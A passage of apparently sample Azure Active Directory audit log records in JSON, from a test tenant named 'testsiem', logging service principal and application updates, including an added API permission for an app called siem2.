"Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": 
"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": 
"env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": 
"fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", 
"Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], 
"ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": 
"targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n 
},\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": 
"targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 